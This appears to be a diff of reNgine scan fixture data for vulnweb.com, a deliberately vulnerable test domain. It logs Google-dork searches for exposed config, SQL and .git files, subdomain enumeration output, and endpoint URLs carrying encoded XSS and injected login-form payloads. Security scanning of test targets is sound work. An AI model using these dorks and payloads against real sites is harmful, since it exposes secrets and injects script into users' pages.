/home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1matlassian.net\u001b[0m\n\nSorry, no results found.", - "time": "2024-09-03T21:26:33.737Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FLogin%2Easp%3F", + "content_length": 3194, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:24.870Z", + "response_time": 0.34880641, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 20, + "model": "startScan.endpoint", + "pk": 91, "fields": { "scan_history": 1, - "activity": 1, - "command": "tlsx -san -cn -silent -ro -host vulnweb.com | sed -n '/^\\([a-zA-Z0-9]\\([-a-zA-Z0-9]*[a-zA-Z0-9]\\)\\?\\.\\)\\+vulnweb.com$/p' | uniq | sort > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/subdomains_tlsx.txt", - "return_code": 0, - "output": "", - "time": "2024-09-03T21:26:34.437Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FLogin.asp%3F", + "content_length": 3194, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:24.990Z", + "response_time": 0.34090942, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 21, + "model": "startScan.endpoint", + "pk": 92, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t github.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mgithub.com\u001b[0m\n\n===================================================================\nDirectories and files found from: \u001b[1mvulnweb.com\u001b[0m\n===================================================================\n\nhttps://github.com/dradis/dradis-acunetix/blob/master/spec/fixtures/files/testphp.vulnweb.com.export.acunetix.xml\nhttps://github.com/dtag-dev-sec/explo/blob/master/examples/SQLI_LOGIN_testphp.vulnweb.com.yaml\nhttps://github.com/dtag-dev-sec/explo/blob/master/examples/SQLI_testphp.vulnweb.com.yaml\nhttps://github.com/yangbh/Hammer/blob/master/output/testphp.vulnweb.com/http_testphp.vulnweb.com", - "time": "2024-09-03T21:26:34.456Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FRegister%2Easp%3F", + "content_length": 3200, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:32.737Z", + "response_time": 0.353088416, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 22, + "model": "startScan.endpoint", + "pk": 93, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t gitlab.com -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mgitlab.com\u001b[0m\n\nSorry, no results found.", - "time": "2024-09-03T21:26:38.165Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch", + "content_length": 3212, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:32.888Z", + "response_time": 0.342827, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 23, + "model": "startScan.endpoint", + "pk": 94, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t bitbucket.org -d 3 -p 2 -w vulnweb.com -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mbitbucket.org\u001b[0m\n\n===================================================================\nDirectories and files found from: \u001b[1mvulnweb.com\u001b[0m\n===================================================================\n\nhttps://bitbucket.org/snippets/alms/KrG4LL\nhttps://bitbucket.org/snippets/bakueikozo/rex9ar/playstation-classic-uart-login-console\nhttps://bitbucket.org/snippets/especnorthamerica/neb6dq/examples-of-web-controller-rest-api-usage\nhttps://bitbucket.org/snippets/faridani/pRX6r\nhttps://bitbucket.org/snippets/orrp/xeGzXB/interactive-mgg\nhttps://bitbucket.org/snippets/raerose01/5enKR5\nhttps://bitbucket.org/snippets/sglienke/64LG6b/introsort\nhttps://bitbucket.org/snippets/sglienke/6oBqMb\nhttps://bitbucket.org/snippets/suntorytime/rAGXar/wellness-sources-overview\nhttps://bitbucket.org/snippets/wmgodyak/6bXKj", - "time": "2024-09-03T21:26:38.820Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3F", + "content_length": 3196, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:33.018Z", + "response_time": 0.358097958, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 24, + "model": "startScan.endpoint", + "pk": 95, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t vulnweb.com -d 3 -p 4 -e env,xml,conf,toml,yml,yaml,cnf,inf,rdp,ora,txt,cfg,ini -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\nSorry, no results found for \u001b[1menv\u001b[0m.\n\n===================================================================\nExtension: \u001b[1mxml\u001b[0m\n===================================================================\n\nhttp://testphp.vulnweb.com/.idea/workspace.xml\nhttp://testphp.vulnweb.com/crossdomain.xml\n\n\u001b[1m[!]\u001b[0m Oops... Looks like Google has temporarily blocked your IP address.", - "time": "2024-09-03T21:26:42.598Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%25253", + "content_length": 3230, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:33.160Z", + "response_time": 0.34315919500000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 25, + "model": "startScan.endpoint", + "pk": 96, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t vulnweb.com -d 3 -p 1 -w Jenkins -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\n\u001b[1m[!]\u001b[0m Oops... Looks like Google has temporarily blocked your IP address.", - "time": "2024-09-03T21:26:47.795Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D", + "content_length": 3218, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:33.304Z", + "response_time": 0.35215466700000003, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 26, + "model": "startScan.endpoint", + "pk": 97, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t vulnweb.com -d 3 -p 5 -w /wp-content/,/wp-includes/ -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\n\u001b[1m[!]\u001b[0m Oops... Looks like Google has temporarily blocked your IP address.", - "time": "2024-09-03T21:26:48.862Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogi", + "content_length": 3292, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:33.454Z", + "response_time": 0.34424749400000004, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 27, + "model": "startScan.endpoint", + "pk": 98, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t vulnweb.com -d 3 -p 5 -w PHP Parse error,PHP Warning,PHP Error -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\n\u001b[1m[!]\u001b[0m Oops... Looks like Google has temporarily blocked your IP address.", - "time": "2024-09-03T21:26:49.546Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%2525u003C%2525s%2525v%2525g%2525%2520%2525o%2525n%2525l%2525o%2525a%2525d%2525%2525u003D%2525a%2525l%2525e%2525r%2525t%2525%28%25251%2525%29%2525%253E", + "content_length": 3520, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:33.586Z", + "response_time": 0.347665845, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 28, + "model": "startScan.endpoint", + "pk": 99, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t vulnweb.com -d 3 -p 7 -e doc,docx,odt,pdf,rtf,sxw,psw,ppt,pptx,pps,csv -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\n\u001b[1m[!]\u001b[0m Oops... Looks like Google has temporarily blocked your IP address.", - "time": "2024-09-03T21:26:50.666Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253C%2520form%2Baction%253D%2522test%2Easp%2522%253E%253Ctable%253E%253Ctr%253E%253Ctd%253ELogin%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2Btype%253Dtext%2B%2520length%253D20%2Bname%253Dlogin%253E%253C%252Ftd%253E%253C%252Ftr%253E%253Ctr%253E%253Ctd%253EPassword%253A%253C%252Ftd%253E%253Ctd%253E%253Cinput%2520%2Btype%253Dtext%2Blength%253D20%2Bname%253Dpassword%253E%253C%252Ftd%253E%253C%252Ftr%253E%253C%252Ftable%253E%253Cinput%2Btype%253Dsubmit%2Bvalue%2520%253DLOGIN%253E%253C%252Fform%253E", + "content_length": 4406, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:33.720Z", + "response_time": 0.348654799, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 29, + "model": "startScan.endpoint", + "pk": 100, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t vulnweb.com -d 3 -p 1 -e sql,db,dbf,mdb -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\n\u001b[1m[!]\u001b[0m Oops... Looks like Google has temporarily blocked your IP address.", - "time": "2024-09-03T21:26:51.510Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2B", + "content_length": 3314, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:33.851Z", + "response_time": 0.34786833, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 30, + "model": "startScan.endpoint", + "pk": 101, "fields": { "scan_history": 1, - "activity": null, - "command": "GooFuzz -t vulnweb.com -d 3 -p 1 -e git -o /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/gofuzz.txt", - "return_code": 1, - "output": "\n*********************************************************\n* GooFuzz 1.2.5 - The Power of Google Dorks\t\t*\n*********************************************************\n\nTarget: \u001b[1mvulnweb.com\u001b[0m\n\n\u001b[1m[!]\u001b[0m Oops... Looks like Google has temporarily blocked your IP address.", - "time": "2024-09-03T21:26:52.449Z" + "target_domain": 1, + "subdomain": 75, + "source": null, + "http_url": "http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cbr%253E%253Cbr%253EPlease%2Blogin%2Bwith%2Bthe%2Bform%2Bbelow%2Bbefore%2Bproceeding%253A%253Cform%2Baction%253D%2522test%2Easp", + "content_length": 3480, + "page_title": "acuforum login", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:33.978Z", + "response_time": 0.348705861, + "webserver": "Microsoft-IIS/8.5", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 5, + 6, + 7, + 8 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.command", - "pk": 31, + "model": "startScan.endpoint", + "pk": 102, "fields": { "scan_history": 1, - "activity": 1, - "command": "oneforall --target vulnweb.com run && cut -d',' -f6 /home/rengine/tools/.github/OneForAll/results/vulnweb.com.csv | tail -n +2 > /home/rengine/scan_results/vulnweb.com/scans/14c80983-6a3b-11ef-b939-73cc220d8f97/subdomains_oneforall.txt && rm -rf /home/rengine/tools/.github/OneForAll/results/vulnweb.com.csv", - "return_code": 0, - "output": "\n\nOneForAll is a powerful subdomain integration tool\u001b[01;33m\n___ _ _\n___ ___ ___| _|___ ___ ___| | | \u001b[01;37m{\u001b[1;31mv0.4.5 #dev\u001b[01;37m}\u001b[01;32m\n| . | | -_| _| . | _| .'| | | \u001b[01;34m\n|___|_|_|___|_| |___|_| |__,|_|_| \u001b[01;37mgit.io/fjHT1\n\n\u001b[1;31mOneForAll is under development, please update before each use!\u001b[0m\n\n[*] Starting OneForAll @ 2024-09-03 21:27:05\n\n21:27:05,902 [INFOR] utils:532 - Checking dependent environment\n21:27:05,902 [INFOR] utils:544 - Checking network environment\n21:27:06,465 [INFOR] utils:555 - Checking for the latest version\n21:27:06,730 [INFOR] utils:579 - The current version v0.4.5 is already the latest version\n21:27:06,731 [INFOR] oneforall:241 - Start running OneForAll\n21:27:06,732 [INFOR] oneforall:246 - Got 1 domains\n21:27:06,763 [INFOR] wildcard:108 - Detecting vulnweb.com use wildcard dns record or not\n21:27:06,881 [ALERT] wildcard:47 - 370500ba.vulnweb.com resolve to: 370500ba.vulnweb.com. IP: {'44.228.249.3'} TTL: 3600\n21:27:06,907 [ALERT] wildcard:47 - 62a5f2cb.vulnweb.com resolve to: 62a5f2cb.vulnweb.com. IP: {'44.228.249.3'} TTL: 3600\n21:27:06,933 [ALERT] wildcard:47 - ee447f63.vulnweb.com resolve to: ee447f63.vulnweb.com. IP: {'44.228.249.3'} TTL: 3600\n21:27:06,934 [INFOR] utils:700 - Attempting to request http://370500ba.vulnweb.com\n21:27:07,318 [ALERT] utils:708 - Error request http://370500ba.vulnweb.com\n21:27:07,318 [INFOR] utils:700 - Attempting to request http://62a5f2cb.vulnweb.com\n21:27:07,721 [ALERT] utils:708 - Error request http://62a5f2cb.vulnweb.com\n21:27:07,722 [INFOR] utils:700 - Attempting to request http://ee447f63.vulnweb.com\n21:27:08,135 [ALERT] utils:708 - Error request http://ee447f63.vulnweb.com\n21:27:08,135 [ALERT] wildcard:121 - The domain vulnweb.com enables wildcard\n21:27:08,135 [INFOR] collect:44 - Start collecting subdomains of vulnweb.com\n21:27:08,208 [INFOR] module:63 - AXFRCheck module took 0.0 seconds found 0 subdomains\n21:27:08,218 [INFOR] module:63 - NSECCheck module took 0.0 seconds found 0 subdomains\n21:27:08,232 [INFOR] module:63 - QueryMX module took 0.0 seconds found 0 subdomains\n21:27:08,232 [INFOR] module:63 - QuerySOA module took 0.0 seconds found 0 subdomains\n21:27:08,233 [INFOR] module:63 - QueryNS module took 0.0 seconds found 0 subdomains\n21:27:08,262 [INFOR] module:63 - QuerySPF module took 0.0 seconds found 0 subdomains\n21:27:08,267 [INFOR] module:63 - QueryTXT module took 0.1 seconds found 0 subdomains\n21:27:08,418 [ERROR] module:129 - HTTPSConnectionPool(host='riddler.io', port=443): Max retries exceeded with url: /search?q=pld%3Avulnweb.com (Caused by NewConnectionError(': Failed to establish a new connection: [Errno -5] No address associated with hostname'))\n21:27:08,419 [INFOR] module:63 - RiddlerQuery module took 0.2 seconds found 0 subdomains\n21:27:08,448 [INFOR] module:63 - CrtshQuery module took 0.3 seconds found 0 subdomains\n21:27:08,537 [ALERT] utils:273 - GET https://www.dnsgrep.cn/subdomain/vulnweb.com 403 - Forbidden 17723\n21:27:08,538 [INFOR] module:63 - DnsgrepQuery module took 0.3 seconds found 0 subdomains\n21:27:08,555 [INFOR] module:63 - SiteDossierQuery module took 0.4 seconds found 4 subdomains\n21:27:08,556 [INFOR] module:63 - CertSpotterQuery module took 0.4 seconds found 0 subdomains\n21:27:08,564 [INFOR] module:63 - ThreatMinerQuery module took 0.4 seconds found 0 subdomains\n21:27:08,646 [INFOR] module:63 - UrlscanQuery module took 0.4 seconds found 8 subdomains\n21:27:08,648 [ALERT] utils:273 - GET https://www.virustotal.com/ui/domains/vulnweb.com/subdomains?limit=40&cursor= 429 - Too Many Requests 181\n21:27:08,648 [ALERT] utils:282 - {'error': {'code': 'RecaptchaRequiredError', 'message': 'Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header'}}\n21:27:08,649 [INFOR] module:63 - CSPCheck module took 0.5 seconds found 0 subdomains\n21:27:08,650 [INFOR] module:63 - VirusTotalQuery module took 0.4 seconds found 0 subdomains\n21:27:08,726 [ALERT] utils:273 - GET https://fullhunt.io/api/v1/domain/vulnweb.com/subdomains 401 - UNAUTHORIZED 50\n21:27:08,726 [ALERT] utils:282 - {'message': 'Unauthorized access', 'success': False}\n21:27:08,728 [INFOR] module:63 - FullHuntAPIQuery module took 0.5 seconds found 0 subdomains\n21:27:08,894 [INFOR] module:63 - AnubisQuery module took 0.7 seconds found 12 subdomains\n21:27:08,895 [ALERT] utils:273 - GET https://transparencyreport.google.com/transparencyreport/api/v3/httpsreport/ct/certsearch?include_expired=true&include_subdomains=true&domain=vulnweb.com 404 - Not Found 1611\n21:27:08,897 [INFOR] module:63 - GoogleQuery module took 0.7 seconds found 0 subdomains\n21:27:08,953 [INFOR] module:63 - HackerTargetQuery module took 0.8 seconds found 22 subdomains\n21:27:09,137 [INFOR] module:63 - AlienVaultQuery module took 0.9 seconds found 19 subdomains\n21:27:09,276 [ALERT] utils:273 - GET https://searchdns.netcraft.com/?restriction=site+contains&position=limited&host=%2A.vulnweb.com&from=1 403 - Forbidden 17830\n21:27:09,277 [INFOR] module:63 - NetCraftQuery module took 1.1 seconds found 0 subdomains\n21:27:09,399 [INFOR] module:63 - AskSearch module took 1.2 seconds found 0 subdomains\n21:27:09,427 [INFOR] module:63 - DNSDumpsterQuery module took 1.2 seconds found 11 subdomains\n21:27:09,572 [ALERT] utils:273 - GET https://ce.baidu.com/index/getRelatedSites?site_address=vulnweb.com 500 - Internal Server Error 0\n21:27:09,573 [INFOR] module:63 - CeBaiduQuery module took 1.4 seconds found 0 subdomains\n21:27:09,666 [ALERT] utils:273 - POST https://www.dnsscan.cn/dns.html?keywords=vulnweb.com&page=1 404 - Not Found 206\n21:27:09,668 [INFOR] module:63 - QianXunQuery module took 1.5 seconds found 0 subdomains\n21:27:09,897 [INFOR] module:63 - BingSearch module took 1.7 seconds found 0 subdomains\n21:27:09,985 [INFOR] module:63 - ChinazQuery module took 1.8 seconds found 2 subdomains\n21:27:10,151 [INFOR] module:63 - MySSLQuery module took 2.0 seconds found 0 subdomains\n21:27:10,355 [INFOR] module:63 - RapidDNSQuery module took 2.2 seconds found 281 subdomains\n21:27:10,428 [INFOR] module:63 - SogouSearch module took 2.2 seconds found 5 subdomains\n21:27:10,760 [INFOR] module:63 - IP138Query module took 2.6 seconds found 16 subdomains\n21:27:10,878 [INFOR] module:63 - GiteeSearch module took 2.7 seconds found 0 subdomains\n21:27:11,603 [ERROR] module:129 - HTTPSConnectionPool(host='api.sublist3r.com', port=443): Max retries exceeded with url: /search.php?domain=vulnweb.com (Caused by SSLError(SSLError(1, '[SSL: TLSV1_ALERT_INTERNAL_ERROR] tlsv1 alert internal error (_ssl.c:997)')))\n21:27:11,604 [INFOR] module:63 - Sublist3rQuery module took 3.4 seconds found 0 subdomains\n21:27:11,627 [INFOR] module:63 - YahooSearch module took 3.4 seconds found 0 subdomains\n21:27:11,922 [INFOR] module:63 - RobtexQuery module took 3.7 seconds found 15 subdomains\n21:27:12,070 [INFOR] module:63 - BaiduSearch module took 3.9 seconds found 0 subdomains\n21:27:12,271 [INFOR] module:63 - WzSearch module took 4.1 seconds found 0 subdomains\n21:27:12,901 [INFOR] module:63 - SoSearch module took 4.7 seconds found 1 subdomains\n21:27:12,985 [ALERT] utils:273 - GET https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dsite%253A.vulnweb.com%26start%3D1%26num%3D50%26filter%3D0%26btnG%3DSearch%26gbv%3D1%26hl%3Den&hl=en&q=EgRdFhUyGLD-3bYGIjAXsFmbSQzD5Zn_V7wNiBiIu7JIhrukOC5iwq21AZzzrLaQgQb6Du1W_V-vgWEc488yAXJaAUM 429 - Too Many Requests 3385\n21:27:12,987 [INFOR] module:63 - GoogleSearch module took 4.8 seconds found 0 subdomains\n21:27:14,309 [INFOR] module:63 - YandexSearch module took 6.1 seconds found 0 subdomains\n21:27:18,296 [INFOR] module:63 - CertInfo module took 10.1 seconds found 0 subdomains\n21:27:34,346 [INFOR] module:63 - SitemapCheck module took 26.2 seconds found 0 subdomains\n21:27:34,702 [INFOR] module:63 - RobotsCheck module took 26.5 seconds found 0 subdomains\n21:27:34,710 [INFOR] module:63 - CrossDomainCheck module took 26.5 seconds found 0 subdomains\n21:27:34,906 [INFOR] module:63 - BruteSRV module took 0.2 seconds found 0 subdomains\n21:27:34,910 [INFOR] brute:460 - Start running Brute module\n21:27:34,911 [INFOR] brute:410 - Blasting vulnweb.com\n21:27:34,911 [INFOR] utils:174 - /home/rengine/tools/.github/OneForAll/results/temp does not exist, directory will be created\n21:27:34,911 [INFOR] brute:119 - Querying NS records of vulnweb.com\n21:27:34,936 [INFOR] brute:129 - vulnweb.com's authoritative name server is ['ns1.eurodns.com.', 'ns2.eurodns.com.', 'ns3.eurodns.com.', 'ns4.eurodns.com.']\n21:27:34,936 [INFOR] brute:99 - Querying A record from authoritative name server: ['ns1.eurodns.com.', 'ns2.eurodns.com.', 'ns3.eurodns.com.', 'ns4.eurodns.com.']\n21:27:35,027 [INFOR] brute:114 - Authoritative name server A record result: ['199.167.66.107', '104.37.178.107', '199.167.66.108', '104.37.178.108']\n21:27:35,027 [INFOR] wildcard:159 - Collecting wildcard dns record for vulnweb.com\n21:27:35,028 [INFOR] wildcard:128 - Query e5822a54.vulnweb.com 's wildcard dns record in authoritative name server\n21:27:35,042 [INFOR] wildcard:153 - e5822a54.vulnweb.com results on authoritative name server: e5822a54.vulnweb.com. IP: {'44.228.249.3'} TTL: 3600\n21:27:35,043 [INFOR] wildcard:128 - Query 2d14ad45.vulnweb.com 's wildcard dns record in authoritative name server\n21:27:35,058 [INFOR] wildcard:153 - 2d14ad45.vulnweb.com results on authoritative name server: 2d14ad45.vulnweb.com. IP: {'44.228.249.3'} TTL: 3600\n21:27:35,059 [INFOR] brute:347 - Generating dictionary for vulnweb.com\n21:27:35,131 [ALERT] utils:695 - Please check whether sol.vulnweb.com is correct or not\n21:27:35,133 [INFOR] brute:365 - Dictionary size: 95247\n21:27:35,165 [INFOR] brute:441 - Running massdns to brute subdomains\n21:27:39,270 [INFOR] brute:197 - Counting IP cname appear times\n21:27:39,510 [INFOR] brute:238 - Processing result\n21:27:40,095 [ALERT] brute:451 - Brute module takes 5.2 seconds, found 4 subdomains of vulnweb.com\n21:27:40,109 [INFOR] brute:489 - Finished Brute module to brute vulnweb.com\n21:27:40,125 [INFOR] resolve:143 - Start resolving subdomains of vulnweb.com\n21:27:40,144 [INFOR] resolve:166 - Running massdns to resolve subdomains\n21:27:42,189 [INFOR] resolve:104 - Processing resolved results\n21:27:42,192 [INFOR] resolve:172 - Finished resolve subdomains of vulnweb.com\n21:27:42,192 [INFOR] resolve:61 - Saving resolved results\n21:27:42,236 [INFOR] request:258 - Start requesting subdomains of vulnweb.com\n21:27:42,236 [INFOR] request:39 - Port range:[80, 443]\n21:27:42,237 [INFOR] request:56 - Generating request urls\n21:27:42,237 [INFOR] request:217 - Requesting urls in bulk\n\n0it [00:00, ?it/s]\nRequest Progress: 88%|███████████████████████▋ | 7/8 [00:00<00:00, 70.00it/s]\nRequest Progress: 9it [00:13, 1.46s/it]\n21:27:55,384 [INFOR] request:264 - Found that vulnweb.com has 3 alive subdomains\n21:27:55,384 [INFOR] finder:23 - Start Finder module\n\n0it [00:00, ?it/s]21:27:55,387 [INFOR] request:217 - Requesting urls in bulk\n\nRequest Progress: 1it [00:00, 4165.15it/s]\n21:27:55,389 [INFOR] module:63 - Finder module took 0.0 seconds found 1 subdomains\n21:27:55,389 [INFOR] resolve:143 - Start resolving subdomains of vulnweb.com\n21:27:55,409 [INFOR] resolve:166 - Running massdns to resolve subdomains\n21:27:55,436 [INFOR] resolve:104 - Processing resolved results\n\n0it [00:00, ?it/s]21:27:55,436 [INFOR] resolve:172 - Finished resolve subdomains of vulnweb.com\n21:27:55,437 [INFOR] request:258 - Start requesting subdomains of vulnweb.com\n21:27:55,437 [INFOR] request:39 - Port range:[80, 443]\n21:27:55,437 [INFOR] request:56 - Generating request urls\n21:27:55,437 [INFOR] request:217 - Requesting urls in bulk\n\nRequest Progress: 3it [00:13, 4.36s/it]\n21:28:08,520 [INFOR] request:264 - Found that vulnweb.com has 4 alive subdomains\n21:28:08,520 [INFOR] altdns:203 - Start altdns module\n\n0it [00:00, ?it/s]21:28:08,529 [INFOR] altdns:210 - The altdns module generated 0 new subdomains\n21:28:08,529 [INFOR] resolve:143 - Start resolving subdomains of vulnweb.com\n21:28:08,529 [INFOR] request:258 - Start requesting subdomains of vulnweb.com\n21:28:08,530 [INFOR] request:39 - Port range:[80, 443]\n21:28:08,530 [INFOR] request:56 - Generating request urls\n21:28:08,530 [INFOR] request:217 - Requesting urls in bulk\n\nRequest Progress: 1it [00:00, 391.52it/s]\n21:28:08,534 [INFOR] request:264 - Found that vulnweb.com has 4 alive subdomains\n21:28:08,877 [ALERT] export:66 - The subdomain result for vulnweb.com: /home/rengine/tools/.github/OneForAll/results/vulnweb.com.csv\n21:28:08,878 [INFOR] oneforall:255 - Finished OneForAll", - "time": "2024-09-03T21:27:04.860Z" - } -}, + 